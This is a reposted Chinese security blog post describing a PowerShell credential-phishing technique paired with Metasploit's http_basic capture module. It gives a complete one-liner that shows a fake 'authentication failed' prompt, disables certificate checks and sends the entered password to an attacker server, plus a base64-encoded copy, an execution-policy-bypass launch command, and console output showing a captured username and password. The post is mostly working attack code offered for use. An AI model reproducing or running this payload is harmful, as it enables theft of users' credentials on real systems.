转载

[组合拳]Powershell弹出窗口+ Capture模块

Metasploit Minute已经进入第三季。接下来我们将会使用Metasploit的Capture模块从这个PowerShell弹出中捕获权限。不需要admin，不需要UAC绕过，仅仅是通过SSL就可以了。

这里是代码

$cred =$host.ui.promptforcredential('FailedAuthentication','',[Environment]::UserDomainName + "/" +[Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback= {$true}; $wc = new-object net.webclient; $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable(Red Hat modified)"); $wc.Proxy =[System.Net.WebRequest]::DefaultWebProxy; $wc.Proxy.Credentials =[System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.credentials = new-object system.net.networkcredential($cred.username,$cred.getnetworkcredential().password, ''); $result= $wc.downloadstring('https://172.16.102.163');

我们一行一行的分解看

$cred= $host.ui.promptforcredential('FailedAuthentication','',[Environment]::UserName,[Environment]::UserDomainName);

窗口提示输入凭证，标题显示“身份验证失败”，但是其他地方就没有什么内容显示了（使用的是默认设置），框中包括用户名以及域名增加其真实性。

[System.Net.ServicePointManager]::ServerCertificateValidationCallback= {$true};

让PowerShell不验证SSL证书（允许后面我们可以使用自签署的证书进行HTTPS服务）

$wc = new-object net.webclient; $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable(Red Hat modified)");

创建一个新的Web用户项目，并将user-agent设置为wget

$wc.Proxy =[System.Net.WebRequest]::DefaultWebProxy; $wc.Proxy.Credentials= [System.Net.CredentialCache]::DefaultNetworkCredentials;

告诉PowerShell无论当前用户使用proxy连接还是其他方式，如果不重要那么就忽略掉。

$wc.credentials = new-objectsystem.net.networkcredential($cred.username,$cred.getnetworkcredential().password, '');

告诉PowerShell，基于HTTP的认证的用户在弹出框中需要输入最近的记录。

$result =$wc.downloadstring('https://172.16.102.163');

最后在Metasploit中利用capture模块

cat power.txt | iconv --to-code UTF-16LE |base64   JABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAHAAcgBvAG0AcAB0AGYAbwByAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAIAArACAAIgBcACIAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBOAGEAbQBlACwAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBEAG8AbQBhAGkAbgBOAGEAbQBlACkAOwAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwAIgBXAGcAZQB0AC8AMQAuADkAKwBjAHYAcwAtAHMAdABhAGIAbABlACAAKABSAGUAZAAgAEgAYQB0ACAAbQBvAGQAaQBmAGkAZQBkACkAIgApADsACgAkAHcAYwAuAFAAcgBvAHgAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsACgAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsACgAkAHcAYwAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAYwByAGUAZABlAG4AdABpAGEAbAAoACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQAsACAAJABjAHIAZQBkAC4AZwBlAHQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAuAHAAYQBzAHMAdwBvAHIAZAAsACAAJwAnACkAOwAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcAMgAuADEANgAuADEAMAAyAC4AMQA2ADMAJwApADsACgA=

然后执行

powershell -ep bypass -enc

你可以得到一下这张图

[组合拳]Powershell弹出窗口+ Capture模块

root@wpad:~/metasploit-framework#./msfconsole -Lq msf > useauxiliary/server/capture/http_basic msf auxiliary(http_basic) > show options   Module options(auxiliary/server/capture/http_basic):     Name         Current Setting  Required Description   ----         ---------------  -------- -----------   REALM        Secure Site      yes      The authentication realm you'd like to present.   RedirectURL                  no        The page to redirectusers to after they enter basic auth creds   SRVHOST      0.0.0.0          yes       The local host to listen on. This mustbe an address on the local machine or 0.0.0.0   SRVPORT      80               yes       The local port to listen on.   SSL          false            no        Negotiate SSL for incoming connections   SSLCert                      no        Path to a custom SSLcertificate (default is randomly generated)   SSLVersion   SSL3             no        Specify the version of SSL that shouldbe used (accepted: SSL2, SSL3, TLS1)   URIPATH                      no        The URI to use for thisexploit (default is random)   msf auxiliary(http_basic) > set SSL true SSL => true msf auxiliary(http_basic) > set SRVPORT443 SRVPORT => 443 msf auxiliary(http_basic) > set URIPATH / URIPATH => / msf auxiliary(http_basic) > run [*] Auxiliary module execution completed msf auxiliary(http_basic) > [*] Listening on 0.0.0.0:443... [*] Using URL: https://0.0.0.0:443/ [*] Local IP: https://172.16.102.163:443/ [*] Server started. [*] 172.16.102.140   http_basic - Sending 401 to client172.16.102.140 [+] 172.16.102.140 -Credential collected: "SITTINGDUCK/user:ASDqwe123" => /

Game Over

这篇文搭配视频会比较有代入感。

最后送上传送门

https://www.youtube.com/watch?v=H_E3FNF8rBw

链接：http://pan.baidu.com/s/1eQvkw6Y 密码：mysb[小水管，画质不是很好]

【via@91RI.ORG团队】

正文到此结束